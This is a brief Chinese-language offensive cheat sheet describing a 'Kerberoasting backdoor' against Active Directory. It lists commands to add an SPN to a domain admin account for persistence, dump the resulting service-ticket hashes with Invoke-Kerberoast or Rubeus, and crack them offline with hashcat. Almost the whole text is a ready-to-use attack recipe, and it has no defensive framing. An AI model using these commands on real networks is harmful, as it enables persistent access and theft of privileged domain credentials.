Kerberoasting后门
当有setspn权限时,为域用户添加一个SPN
>setspn -U -A RDP/zone.com godadmin
域内任何主机可以使用Kerberoast 获得TGS
https://github.com/malachitheninja/Invoke-Kerberoast
>Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | Select hash | ConvertTo-CSV -NoTypeInformation |Out-File xx.txt
或使用rubeus.exe
破解
>hashcat -m 13100 -a 0 kerberos.txt wordlist.txt